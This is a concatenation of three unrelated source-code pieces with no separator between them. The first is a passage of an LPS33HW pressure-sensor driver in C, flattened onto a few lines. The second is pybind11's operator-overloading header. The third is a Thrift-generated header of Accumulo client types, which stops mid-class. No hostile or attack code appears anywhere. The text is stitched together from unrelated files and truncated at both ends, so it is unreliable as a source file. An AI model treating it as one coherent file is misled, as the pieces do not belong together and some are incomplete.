*/ static int lps33hw_get_regs(struct sensor_itf *itf, uint8_t reg, uint8_t size, uint8_t *buffer) { int rc; if (itf->si_type == SENSOR_ITF_I2C) { rc = lps33hw_i2c_get_regs(itf, reg, size, buffer); } else { rc = lps33hw_spi_get_regs(itf, reg, size, buffer); } return rc; } static int lps33hw_apply_value(struct lps33hw_register_value addr, uint8_t value, uint8_t *reg) { value <<= addr.pos; if ((value & (~addr.mask)) != 0) { return -1; } *reg &= ~addr.mask; *reg |= value; return 0; } int lps33hw_set_value(struct sensor_itf *itf, struct lps33hw_register_value addr, uint8_t value) { int rc; uint8_t reg; rc = lps33hw_get_regs(itf, addr.reg, 1, &reg); if (rc != 0) { return rc; } rc = lps33hw_apply_value(addr, value, &reg); if (rc != 0) { return rc; } return lps33hw_set_reg(itf, addr.reg, reg); } int lps33hw_get_value(struct sensor_itf *itf, struct lps33hw_register_value addr, uint8_t *value) { int rc; uint8_t reg; rc = lps33hw_get_regs(itf, addr.reg, 1, &reg); *value = (reg & addr.mask) >> addr.pos; return rc; } int lps33hw_set_data_rate(struct sensor_itf *itf, enum lps33hw_output_data_rates rate) { return lps33hw_set_value(itf, LPS33HW_CTRL_REG1_ODR, rate); } int lps33hw_set_lpf(struct sensor_itf *itf, enum lps33hw_low_pass_config lpf) { return lps33hw_set_value(itf, LPS33HW_CTRL_REG1_LPFP_CFG, lpf); } int lps33hw_reset(struct sensor_itf *itf) { return lps33hw_set_reg(itf, LPS33HW_CTRL_REG2, 0x04); } int lps33hw_get_pressure_regs(struct sensor_itf *itf, uint8_t reg, float *pressure) { int rc; uint8_t payload[3]; int32_t int_press; rc = lps33hw_get_regs(itf, reg, 3, payload); if (rc) { return rc; } int_press = (((int32_t)payload[2] << 16) | ((int32_t)payload[1] << 8) | payload[0]); if (int_press & 0x00800000) { int_press |= 0xff000000; } *pressure = lps33hw_reg_to_pa(int_press); return 0; } int lps33hw_get_pressure(struct sensor_itf *itf, float *pressure) { return lps33hw_get_pressure_regs(itf, LPS33HW_PRESS_OUT, pressure); } int lps33hw_get_temperature(struct sensor_itf 
*itf, float *temperature) { int rc; uint8_t payload[2]; uint16_t int_temp; rc = lps33hw_get_regs(itf, LPS33HW_TEMP_OUT, 2, payload); if (rc) { return rc; } int_temp = (((uint32_t)payload[1] << 8) | payload[0]); *temperature = lps33hw_reg_to_degc(int_temp); return 0; } int lps33hw_set_reference(struct sensor_itf *itf, float reference) { int rc; int32_t int_reference; int_reference = lps33hw_pa_to_reg(reference); rc = lps33hw_set_reg(itf, LPS33HW_REF_P, int_reference & 0xff); if (rc) { return rc; } rc = lps33hw_set_reg(itf, LPS33HW_REF_P + 1, (int_reference >> 8) & 0xff); if (rc) { return rc; } return lps33hw_set_reg(itf, LPS33HW_REF_P + 2, (int_reference >> 16) & 0xff); } int lps33hw_set_threshold(struct sensor_itf *itf, float threshold) { int rc; int16_t int_threshold; int_threshold = lps33hw_pa_to_threshold_reg(threshold); rc = lps33hw_set_reg(itf, LPS33HW_THS_P, int_threshold & 0xff); if (rc) { return rc; } return lps33hw_set_reg(itf, LPS33HW_THS_P + 1, (int_threshold >> 8) & 0xff); } int lps33hw_set_rpds(struct sensor_itf *itf, uint16_t rpds) { int rc; rc = lps33hw_set_reg(itf, LPS33HW_RPDS, rpds & 0xff); if (rc) { return rc; } return lps33hw_set_reg(itf, LPS33HW_RPDS + 1, (rpds >> 8) & 0xff); } int lps33hw_enable_interrupt(struct sensor *sensor, hal_gpio_irq_handler_t handler, void *arg) { int rc; struct lps33hw *lps33hw; struct sensor_itf *itf; hal_gpio_irq_trig_t trig; hal_gpio_pull_t pull; struct lps33hw_int_cfg *int_cfg; float press; uint8_t int_source; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); int_cfg = &lps33hw->cfg.int_cfg; trig = (int_cfg->active_low) ? HAL_GPIO_TRIG_FALLING : HAL_GPIO_TRIG_RISING; pull = (int_cfg->open_drain) ? 
HAL_GPIO_PULL_UP : HAL_GPIO_PULL_NONE; rc = hal_gpio_irq_init(int_cfg->pin, handler, arg, trig, pull); if (rc) { return rc; } hal_gpio_irq_enable(int_cfg->pin); /* Read pressure and interrupt sources in order to reset the interrupt */ rc = lps33hw_get_pressure_regs(itf, LPS33HW_PRESS_OUT, &press); if (rc) { return rc; } (void)press; rc = lps33hw_get_regs(itf, LPS33HW_INT_SOURCE, 1, &int_source); if (rc) { return rc; } (void)int_source; return 0; } void lps33hw_disable_interrupt(struct sensor *sensor) { struct lps33hw *lps33hw; struct lps33hw_int_cfg *int_cfg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); int_cfg = &lps33hw->cfg.int_cfg; hal_gpio_irq_release(int_cfg->pin); } /** * Handles and interrupt * * @param Pointer to sensor structure * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_handle_interrupt(struct sensor *sensor) { LPS33HW_ERR("Unhandled interrupt\n"); return 0; } /** * Clears the low threshold interrupt * * @param Pointer to sensor structure * @param Sensor type * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_clear_low_thresh(struct sensor *sensor, sensor_type_t type) { struct lps33hw *lps33hw; struct sensor_itf *itf; struct lps33hw_int_cfg *int_cfg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); int_cfg = &lps33hw->cfg.int_cfg; if (type != SENSOR_TYPE_PRESSURE) { return SYS_EINVAL; } int_cfg->pressure_low = 0; return lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PLE, 0); } /** * Clears the high threshold interrupt * * @param Pointer to sensor structure * @param Sensor type * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_clear_high_thresh(struct sensor *sensor, sensor_type_t type) { struct lps33hw *lps33hw; struct sensor_itf *itf; struct lps33hw_int_cfg *int_cfg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); int_cfg = &lps33hw->cfg.int_cfg; if (type != SENSOR_TYPE_PRESSURE) { return 
SYS_EINVAL; } int_cfg->pressure_high = 0; return lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PHE, 0); } static void lps33hw_threshold_interrupt_handler(void * arg) { struct sensor_type_traits *stt = arg; sensor_mgr_put_read_evt(stt); } int lps33hw_config_interrupt(struct sensor *sensor, struct lps33hw_int_cfg cfg) { int rc; struct lps33hw *lps33hw; struct sensor_itf *itf; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); lps33hw->cfg.int_cfg = cfg; if (cfg.data_rdy) { rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PLE, 0); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PHE, 0); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_DIFF_EN, 0); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_INT_S, 0); if (rc) { return rc; } } else if (cfg.pressure_low || cfg.pressure_high){ rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PLE, cfg.pressure_low); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PHE, cfg.pressure_high); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_DIFF_EN, 1); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_INT_S, cfg.pressure_high | (cfg.pressure_low << 1)); if (rc) { return rc; } } else { rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_DIFF_EN, 0); if (rc) { return rc; } } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_DRDY, cfg.data_rdy); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_INT_H_L, cfg.active_low); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_PP_OD, cfg.open_drain); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_LIR, cfg.latched); if (rc) { return rc; } return rc; } /** * Sets up trigger thresholds and enables interrupts * * @param Pointer to sensor structure * @param type of sensor * @param threshold settings to configure * * @return 0 on success, non-zero on failure */ static int 
lps33hw_sensor_set_trigger_thresh(struct sensor *sensor, sensor_type_t sensor_type, struct sensor_type_traits *stt) { struct lps33hw *lps33hw; struct sensor_itf *itf; int rc; struct sensor_press_data *low_thresh; struct sensor_press_data *high_thresh; struct lps33hw_int_cfg int_cfg; float reference; float threshold; if (sensor_type != SENSOR_TYPE_PRESSURE) { return SYS_EINVAL; } lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); low_thresh = stt->stt_low_thresh.spd; high_thresh = stt->stt_high_thresh.spd; int_cfg = lps33hw->cfg.int_cfg; /* turn off existing dready interrupt */ int_cfg.data_rdy = 0; int_cfg.pressure_low = low_thresh->spd_press_is_valid; int_cfg.pressure_high = high_thresh->spd_press_is_valid; threshold = 0; reference = 0; /* * Device only has one threshold which can be set to trigger on positive or * negative thresholds, set it to the lower threshold. */ if (int_cfg.pressure_low) { if (int_cfg.pressure_high) { threshold = (high_thresh->spd_press - low_thresh->spd_press) / 2; reference = low_thresh->spd_press + threshold; } else { reference = low_thresh->spd_press; } } else if (int_cfg.pressure_high) { reference = high_thresh->spd_press; } rc = lps33hw_set_reference(itf, reference); if (rc) { return rc; } rc = lps33hw_set_threshold(itf, threshold); if (rc) { return rc; } rc = lps33hw_config_interrupt(sensor, int_cfg); if (rc) { return rc; } rc = lps33hw_enable_interrupt(sensor, lps33hw_threshold_interrupt_handler, stt); if (rc) { return rc; } return 0; } int lps33hw_init(struct os_dev *dev, void *arg) { struct lps33hw *lps; struct sensor *sensor; int rc; if (!arg || !dev) { return SYS_ENODEV; } lps = (struct lps33hw *) dev; sensor = &lps->sensor; lps->cfg.mask = SENSOR_TYPE_ALL; log_register(dev->od_name, &_log, &log_console_handler, NULL, LOG_SYSLEVEL); /* Initialise the stats entry */ rc = stats_init( STATS_HDR(g_lps33hwstats), STATS_SIZE_INIT_PARMS(g_lps33hwstats, STATS_SIZE_32), 
STATS_NAME_INIT_PARMS(lps33hw_stat_section)); SYSINIT_PANIC_ASSERT(rc == 0); /* Register the entry with the stats registry */ rc = stats_register(dev->od_name, STATS_HDR(g_lps33hwstats)); SYSINIT_PANIC_ASSERT(rc == 0); rc = sensor_init(sensor, dev); if (rc) { return rc; } /* Add the pressure and temperature driver */ rc = sensor_set_driver(sensor, SENSOR_TYPE_PRESSURE | SENSOR_TYPE_TEMPERATURE, (struct sensor_driver *) &g_lps33hw_sensor_driver); if (rc) { return rc; } rc = sensor_set_interface(sensor, arg); if (rc) { return rc; } rc = sensor_mgr_register(sensor); if (rc) { return rc; } if (sensor->s_itf.si_type == SENSOR_ITF_SPI) { rc = hal_spi_config(sensor->s_itf.si_num, &spi_lps33hw_settings); if (rc == EINVAL) { /* If spi is already enabled, for nrf52, it returns -1, We should not * fail if the spi is already enabled */ return rc; } rc = hal_spi_enable(sensor->s_itf.si_num); if (rc) { return rc; } rc = hal_gpio_init_out(sensor->s_itf.si_cs_pin, 1); if (rc) { return rc; } } return rc; } int lps33hw_config(struct lps33hw *lps, struct lps33hw_cfg *cfg) { int rc; struct sensor_itf *itf; itf = SENSOR_GET_ITF(&(lps->sensor)); uint8_t val; rc = lps33hw_get_regs(itf, LPS33HW_WHO_AM_I, 1, &val); if (rc) { return rc; } if (val != LPS33HW_WHO_AM_I_VAL) { return SYS_EINVAL; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_AUTORIFP, cfg->autorifp); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_AUTOZERO, cfg->autozero); if (rc) { return rc; } rc = lps33hw_set_data_rate(itf, cfg->data_rate); if (rc) { return rc; } rc = lps33hw_set_lpf(itf, cfg->lpf); if (rc) { return rc; } rc = lps33hw_config_interrupt(&(lps->sensor), cfg->int_cfg); if (rc) { } rc = sensor_set_type_mask(&(lps->sensor), cfg->mask); if (rc) { return rc; } lps->cfg.mask = cfg->mask; return 0; } static void lps33hw_read_interrupt_handler(void *arg) { int rc; struct sensor *sensor; struct lps33hw *lps33hw; struct sensor_itf *itf; struct sensor_press_data spd; sensor = (struct sensor 
*)arg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); rc = lps33hw_get_pressure(itf, &spd.spd_press); if (rc) { LPS33HW_ERR("Get pressure failed\n"); spd.spd_press_is_valid = 0; } else { spd.spd_press_is_valid = 1; lps33hw->pdd.user_handler(sensor, lps33hw->pdd.user_arg, &spd, SENSOR_TYPE_PRESSURE); } } static int lps33hw_sensor_read(struct sensor *sensor, sensor_type_t type, sensor_data_func_t data_func, void *data_arg, uint32_t timeout) { (void)timeout; int rc; struct sensor_itf *itf; itf = SENSOR_GET_ITF(sensor); if (type & SENSOR_TYPE_PRESSURE) { struct lps33hw *lps33hw; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); if (lps33hw->cfg.int_cfg.data_rdy) { /* Stream read */ lps33hw->pdd.user_handler = data_func; lps33hw->pdd.user_arg = data_arg; rc = lps33hw_enable_interrupt(sensor, lps33hw_read_interrupt_handler, sensor); if (rc) { return rc; } } else { /* Read once */ struct sensor_press_data spd; rc = lps33hw_get_pressure(itf, &spd.spd_press); if (rc) { return rc; } spd.spd_press_is_valid = 1; rc = data_func(sensor, data_arg, &spd, SENSOR_TYPE_PRESSURE); } } else if (type & SENSOR_TYPE_TEMPERATURE) { struct sensor_temp_data std; rc = lps33hw_get_temperature(itf, &std.std_temp); if (rc) { return rc; } std.std_temp_is_valid = 1; rc = data_func(sensor, data_arg, &std, SENSOR_TYPE_TEMPERATURE); } else { return SYS_EINVAL; } return rc; } static int lps33hw_sensor_set_config(struct sensor *sensor, void *cfg) { struct lps33hw* lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); return lps33hw_config(lps33hw, (struct lps33hw_cfg*)cfg); } static int lps33hw_sensor_get_config(struct sensor *sensor, sensor_type_t type, struct sensor_cfg *cfg) { /* If the read isn't looking for pressure, don't do anything. */ if (!(type & (SENSOR_TYPE_PRESSURE | SENSOR_TYPE_TEMPERATURE))) { return SYS_EINVAL; } cfg->sc_valtype = SENSOR_VALUE_TYPE_FLOAT; return 0; }
/*
    pybind11/operator.h: Metatemplates for operator overloading

    Copyright (c) 2016 Wenzel Jakob <wenzel.jakob@epfl.ch>

    All rights reserved. Use of this source code is governed by a
    BSD-style license that can be found in the LICENSE file.
*/

#pragma once

#include "pybind11.h"

#if defined(__clang__) && !defined(__INTEL_COMPILER)
#  pragma clang diagnostic ignored "-Wunsequenced" // multiple unsequenced modifications to 'self' (when using def(py::self OP Type()))
#elif defined(_MSC_VER)
#  pragma warning(push)
#  pragma warning(disable: 4127) // warning C4127: Conditional expression is constant
#endif

PYBIND11_NAMESPACE_BEGIN(PYBIND11_NAMESPACE)
PYBIND11_NAMESPACE_BEGIN(detail)

/// Enumeration with all supported operator types
enum op_id : int {
    op_add, op_sub, op_mul, op_div, op_mod, op_divmod, op_pow, op_lshift,
    op_rshift, op_and, op_xor, op_or, op_neg, op_pos, op_abs, op_invert,
    op_int, op_long, op_float, op_str, op_cmp, op_gt, op_ge, op_lt, op_le,
    op_eq, op_ne, op_iadd, op_isub, op_imul, op_idiv, op_imod, op_ilshift,
    op_irshift, op_iand, op_ixor, op_ior, op_complex, op_bool, op_nonzero,
    op_repr, op_truediv, op_itruediv, op_hash
};

/// Position of the bound type relative to the operator's other operand.
enum op_type : int {
    op_l, /* base type on left */
    op_r, /* base type on right */
    op_u  /* unary operator */
};

/// Sentinel placeholder for "the class being bound" in operator expressions
/// such as `py::self + py::self`.
struct self_t { };
static const self_t self = self_t();

/// Type for an unused type slot
struct undefined_t { };

/// Don't warn about an unused variable
inline self_t __self() { return self; }

/// base template of operator implementations
template <op_id, op_type, typename B, typename L, typename R> struct op_impl { };

/// Operator implementation generator
template <op_id id, op_type ot, typename L, typename R> struct op_ {
    // Substitute the bound class for each `self_t` slot, then register the
    // concrete op_impl under its Python dunder name.
    template <typename Class, typename... Extra> void execute(Class &cl, const Extra&... extra) const {
        using Base = typename Class::type;
        using L_type = conditional_t<std::is_same<L, self_t>::value, Base, L>;
        using R_type = conditional_t<std::is_same<R, self_t>::value, Base, R>;
        using op = op_impl<id, ot, Base, L_type, R_type>;
        cl.def(op::name(), &op::execute, is_operator(), extra...);
        #if PY_MAJOR_VERSION < 3
        // Python 2 uses __div__/__rdiv__/__idiv__ for classic division.
        if (id == op_truediv || id == op_itruediv)
            cl.def(id == op_itruediv ? "__idiv__" : ot == op_l ? "__div__" : "__rdiv__",
                   &op::execute, is_operator(), extra...);
        #endif
    }
    // Same as execute(), but coerces the result back to the bound type B.
    template <typename Class, typename... Extra> void execute_cast(Class &cl, const Extra&... extra) const {
        using Base = typename Class::type;
        using L_type = conditional_t<std::is_same<L, self_t>::value, Base, L>;
        using R_type = conditional_t<std::is_same<R, self_t>::value, Base, R>;
        using op = op_impl<id, ot, Base, L_type, R_type>;
        cl.def(op::name(), &op::execute_cast, is_operator(), extra...);
        #if PY_MAJOR_VERSION < 3
        if (id == op_truediv || id == op_itruediv)
            cl.def(id == op_itruediv ? "__idiv__" : ot == op_l ? "__div__" : "__rdiv__",
                   &op::execute, is_operator(), extra...);
        #endif
    }
};

// Generates op_impl specializations for both operand orders (op_l/op_r) plus
// the py::self overloads that produce the corresponding op_ descriptors.
#define PYBIND11_BINARY_OPERATOR(id, rid, op, expr)                                    \
template <typename B, typename L, typename R> struct op_impl<op_##id, op_l, B, L, R> { \
    static char const* name() { return "__" #id "__"; }                                \
    static auto execute(const L &l, const R &r) -> decltype(expr) { return (expr); }   \
    static B execute_cast(const L &l, const R &r) { return B(expr); }                  \
};                                                                                     \
template <typename B, typename L, typename R> struct op_impl<op_##id, op_r, B, L, R> { \
    static char const* name() { return "__" #rid "__"; }                               \
    static auto execute(const R &r, const L &l) -> decltype(expr) { return (expr); }   \
    static B execute_cast(const R &r, const L &l) { return B(expr); }                  \
};                                                                                     \
inline op_<op_##id, op_l, self_t, self_t> op(const self_t &, const self_t &) {         \
    return op_<op_##id, op_l, self_t, self_t>();                                       \
}                                                                                      \
template <typename T> op_<op_##id, op_l, self_t, T> op(const self_t &, const T &) {    \
    return op_<op_##id, op_l, self_t, T>();                                            \
}                                                                                      \
template <typename T> op_<op_##id, op_r, T, self_t> op(const T &, const self_t &) {    \
    return op_<op_##id, op_r, T, self_t>();                                            \
}

// In-place operators only exist with the bound type on the left.
#define PYBIND11_INPLACE_OPERATOR(id, op, expr)                                        \
template <typename B, typename L, typename R> struct op_impl<op_##id, op_l, B, L, R> { \
    static char const* name() { return "__" #id "__"; }                                \
    static auto execute(L &l, const R &r) -> decltype(expr) { return expr; }           \
    static B execute_cast(L &l, const R &r) { return B(expr); }                        \
};                                                                                     \
template <typename T> op_<op_##id, op_l, self_t, T> op(const self_t &, const T &) {    \
    return op_<op_##id, op_l, self_t, T>();                                            \
}

#define PYBIND11_UNARY_OPERATOR(id, op, expr)                                          \
template <typename B, typename L> struct op_impl<op_##id, op_u, B, L, undefined_t> {   \
    static char const* name() { return "__" #id "__"; }                                \
    static auto execute(const L &l) -> decltype(expr) { return expr; }                 \
    static B execute_cast(const L &l) { return B(expr); }                              \
};                                                                                     \
inline op_<op_##id, op_u, self_t, undefined_t> op(const self_t &) {                    \
    return op_<op_##id, op_u, self_t, undefined_t>();                                  \
}

PYBIND11_BINARY_OPERATOR(sub,       rsub,       operator-,    l - r)
PYBIND11_BINARY_OPERATOR(add,       radd,       operator+,    l + r)
PYBIND11_BINARY_OPERATOR(mul,       rmul,       operator*,    l * r)
PYBIND11_BINARY_OPERATOR(truediv,   rtruediv,   operator/,    l / r)
PYBIND11_BINARY_OPERATOR(mod,       rmod,       operator%,    l % r)
PYBIND11_BINARY_OPERATOR(lshift,    rlshift,    operator<<,   l << r)
PYBIND11_BINARY_OPERATOR(rshift,    rrshift,    operator>>,   l >> r)
PYBIND11_BINARY_OPERATOR(and,       rand,       operator&,    l & r)
PYBIND11_BINARY_OPERATOR(xor,       rxor,       operator^,    l ^ r)
PYBIND11_BINARY_OPERATOR(eq,        eq,         operator==,   l == r)
PYBIND11_BINARY_OPERATOR(ne,        ne,         operator!=,   l != r)
PYBIND11_BINARY_OPERATOR(or,        ror,        operator|,    l | r)
PYBIND11_BINARY_OPERATOR(gt,        lt,         operator>,    l > r)
PYBIND11_BINARY_OPERATOR(ge,        le,         operator>=,   l >= r)
PYBIND11_BINARY_OPERATOR(lt,        gt,         operator<,    l < r)
PYBIND11_BINARY_OPERATOR(le,        ge,         operator<=,   l <= r)
//PYBIND11_BINARY_OPERATOR(pow,     rpow,       pow,          std::pow(l, r))
PYBIND11_INPLACE_OPERATOR(iadd,     operator+=,   l += r)
PYBIND11_INPLACE_OPERATOR(isub,     operator-=,   l -= r)
PYBIND11_INPLACE_OPERATOR(imul,     operator*=,   l *= r)
PYBIND11_INPLACE_OPERATOR(itruediv, operator/=,   l /= r)
PYBIND11_INPLACE_OPERATOR(imod,     operator%=,   l %= r)
PYBIND11_INPLACE_OPERATOR(ilshift,  operator<<=,  l <<= r)
PYBIND11_INPLACE_OPERATOR(irshift,  operator>>=,  l >>= r)
PYBIND11_INPLACE_OPERATOR(iand,     operator&=,   l &= r)
PYBIND11_INPLACE_OPERATOR(ixor,     operator^=,   l ^= r)
PYBIND11_INPLACE_OPERATOR(ior,      operator|=,   l |= r)
PYBIND11_UNARY_OPERATOR(neg,        operator-,    -l)
PYBIND11_UNARY_OPERATOR(pos,        operator+,    +l)
// WARNING: This usage of `abs` should only be done for existing STL overloads.
// Adding overloads directly in to the `std::` namespace is advised against:
// https://en.cppreference.com/w/cpp/language/extending_std
PYBIND11_UNARY_OPERATOR(abs,        abs,          std::abs(l))
PYBIND11_UNARY_OPERATOR(hash,       hash,         std::hash<L>()(l))
PYBIND11_UNARY_OPERATOR(invert,     operator~,    (~l))
PYBIND11_UNARY_OPERATOR(bool,       operator!,    !!l)
PYBIND11_UNARY_OPERATOR(int,        int_,         (int) l)
PYBIND11_UNARY_OPERATOR(float,      float_,       (double) l)

#undef PYBIND11_BINARY_OPERATOR
#undef PYBIND11_INPLACE_OPERATOR
#undef PYBIND11_UNARY_OPERATOR
PYBIND11_NAMESPACE_END(detail)

// Add named operators so that they are accessible via `py::`.
using detail::self;
using detail::hash;

PYBIND11_NAMESPACE_END(PYBIND11_NAMESPACE)

#if defined(_MSC_VER)
#  pragma warning(pop)
#endif
/**
 * Autogenerated by Thrift Compiler (0.12.0)
 *
 * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
 *  @generated
 */
#ifndef client_TYPES_V2H
#define client_TYPES_V2H

#include <iosfwd>

#include <thrift/Thrift.h>
#include <thrift/TApplicationException.h>
#include <thrift/TBase.h>
#include <thrift/protocol/TProtocol.h>
#include <thrift/transport/TTransport.h>

#include <thrift/stdcxx.h>
#include "security_types.h"
#include "trace_types.h"


namespace org { namespace apache { namespace accumulov2 { namespace core { namespace clientImpl { namespace thrift {

/* Generated enum wrappers: Thrift 0.12 emits each IDL enum as a struct
 * holding a nested `type` enum, plus a value->name map and a stream
 * inserter for logging. */
struct TableOperation {
  enum type {
    CREATE = 0,
    DELETE = 1,
    RENAME = 2,
    SET_PROPERTY = 3,
    REMOVE_PROPERTY = 4,
    OFFLINE = 5,
    ONLINE = 6,
    FLUSH = 7,
    PERMISSION = 8,
    CLONE = 9,
    MERGE = 10,
    DELETE_RANGE = 11,
    BULK_IMPORT = 12,
    COMPACT = 13,
    IMPORT = 14,
    EXPORT = 15,
    COMPACT_CANCEL = 16
  };
};

extern const std::map<int, const char*> _TableOperation_VALUES_TO_NAMES;

std::ostream& operator<<(std::ostream& out, const TableOperation::type& val);

struct TableOperationExceptionType {
  enum type {
    EXISTS = 0,
    NOTFOUND = 1,
    OFFLINE = 2,
    BULK_BAD_INPUT_DIRECTORY = 3,
    BULK_BAD_ERROR_DIRECTORY = 4,
    BAD_RANGE = 5,
    OTHER = 6,
    NAMESPACE_EXISTS = 7,
    NAMESPACE_NOTFOUND = 8,
    INVALID_NAME = 9,
    BULK_BAD_LOAD_MAPPING = 10,
    BULK_CONCURRENT_MERGE = 11
  };
};

extern const std::map<int, const char*> _TableOperationExceptionType_VALUES_TO_NAMES;

std::ostream& operator<<(std::ostream& out, const TableOperationExceptionType::type& val);

struct ConfigurationType {
  enum type {
    CURRENT = 0,
    SITE = 1,
    DEFAULT = 2
  };
};

extern const std::map<int, const char*> _ConfigurationType_VALUES_TO_NAMES;

std::ostream& operator<<(std::ostream& out, const ConfigurationType::type& val);

struct SecurityErrorCode {
  enum type {
    DEFAULT_SECURITY_ERROR = 0,
    BAD_CREDENTIALS = 1,
    PERMISSION_DENIED = 2,
    USER_DOESNT_EXIST = 3,
    CONNECTION_ERROR = 4,
    USER_EXISTS = 5,
    GRANT_INVALID = 6,
    BAD_AUTHORIZATIONS = 7,
    INVALID_INSTANCEID = 8,
    TABLE_DOESNT_EXIST = 9,
    UNSUPPORTED_OPERATION = 10,
    INVALID_TOKEN = 11,
    AUTHENTICATOR_FAILED = 12,
    AUTHORIZOR_FAILED = 13,
    PERMISSIONHANDLER_FAILED = 14,
    TOKEN_EXPIRED = 15,
    SERIALIZATION_ERROR = 16,
    INSUFFICIENT_PROPERTIES = 17,
    NAMESPACE_DOESNT_EXIST = 18
  };
};

extern const std::map<int, const char*> _SecurityErrorCode_VALUES_TO_NAMES;

std::ostream& operator<<(std::ostream& out, const SecurityErrorCode::type& val);

class ThriftSecurityException;

class ThriftTableOperationException;

class ThriftNotActiveServiceException;

class TDiskUsage;

/* Per-struct __isset bookkeeping: one bit per optional field, tracking
 * whether the field was present on the wire. */
typedef struct _ThriftSecurityException__isset {
  _ThriftSecurityException__isset() : user(false), code(false) {}
  bool user :1;
  bool code :1;
} _ThriftSecurityException__isset;

class ThriftSecurityException : public ::apache::thrift::TException {
 public:

  ThriftSecurityException(const ThriftSecurityException&);
  ThriftSecurityException& operator=(const ThriftSecurityException&);
  ThriftSecurityException() : user(), code((SecurityErrorCode::type)0) {
  }

  virtual ~ThriftSecurityException() throw();
  std::string user;
  SecurityErrorCode::type code;

  _ThriftSecurityException__isset __isset;

  void __set_user(const std::string& val);

  void __set_code(const SecurityErrorCode::type val);

  bool operator == (const ThriftSecurityException & rhs) const
  {
    if (!(user == rhs.user))
      return false;
    if (!(code == rhs.code))
      return false;
    return true;
  }
  bool operator != (const ThriftSecurityException &rhs) const {
    return !(*this == rhs);
  }

  bool operator < (const ThriftSecurityException & ) const;

  uint32_t read(::apache::thrift::protocol::TProtocol* iprot);
  uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const;

  virtual void printTo(std::ostream& out) const;
  mutable std::string thriftTExceptionMessageHolder_;
  const char* what() const throw();
};

void swap(ThriftSecurityException &a, ThriftSecurityException &b);

std::ostream& operator<<(std::ostream& out, const ThriftSecurityException& obj);

typedef struct _ThriftTableOperationException__isset {
  _ThriftTableOperationException__isset() : tableId(false), tableName(false), op(false), type(false), description(false) {}
  bool tableId :1;
  bool tableName :1;
  bool op :1;
  bool type :1;
  bool description :1;
} _ThriftTableOperationException__isset;

class ThriftTableOperationException : public ::apache::thrift::TException {
 public:

  ThriftTableOperationException(const ThriftTableOperationException&);
  ThriftTableOperationException& operator=(const ThriftTableOperationException&);
  ThriftTableOperationException() : tableId(), tableName(), op((TableOperation::type)0), type((TableOperationExceptionType::type)0), description() {
  }

  virtual ~ThriftTableOperationException() throw();
  std::string tableId;
  std::string tableName;
  TableOperation::type op;
  TableOperationExceptionType::type type;
  std::string description;

  _ThriftTableOperationException__isset __isset;

  void __set_tableId(const std::string& val);

  void __set_tableName(const std::string& val);

  void __set_op(const TableOperation::type val);

  void __set_type(const TableOperationExceptionType::type val);

  void __set_description(const std::string& val);

  bool operator == (const ThriftTableOperationException & rhs) const
  {
    if (!(tableId == rhs.tableId))
      return false;
    if (!(tableName == rhs.tableName))
      return false;
    if (!(op == rhs.op))
      return false;
    if (!(type == rhs.type))
      return false;
    if (!(description == rhs.description))
      return false;
    return true;
  }
  bool operator != (const ThriftTableOperationException &rhs) const {
    return !(*this == rhs);
  }

  bool operator < (const ThriftTableOperationException & ) const;

  uint32_t read(::apache::thrift::protocol::TProtocol* iprot);
  uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const;

  virtual void printTo(std::ostream& out) const;
  mutable std::string thriftTExceptionMessageHolder_;
  const char* what() const throw();
};

void swap(ThriftTableOperationException &a, ThriftTableOperationException &b);

std::ostream& operator<<(std::ostream& out, const ThriftTableOperationException& obj);

/* Field-less exception: equality is trivially true between any two
 * instances, hence the empty operator==. */
class ThriftNotActiveServiceException : public ::apache::thrift::TException {
 public:

  ThriftNotActiveServiceException(const ThriftNotActiveServiceException&);
  ThriftNotActiveServiceException& operator=(const ThriftNotActiveServiceException&);
  ThriftNotActiveServiceException() {
  }

  virtual ~ThriftNotActiveServiceException() throw();

  bool operator == (const ThriftNotActiveServiceException & /* rhs */) const
  {
    return true;
  }
  bool operator != (const ThriftNotActiveServiceException &rhs) const {
    return !(*this == rhs);
  }

  bool operator < (const ThriftNotActiveServiceException & ) const;

  uint32_t read(::apache::thrift::protocol::TProtocol* iprot);
  uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const;

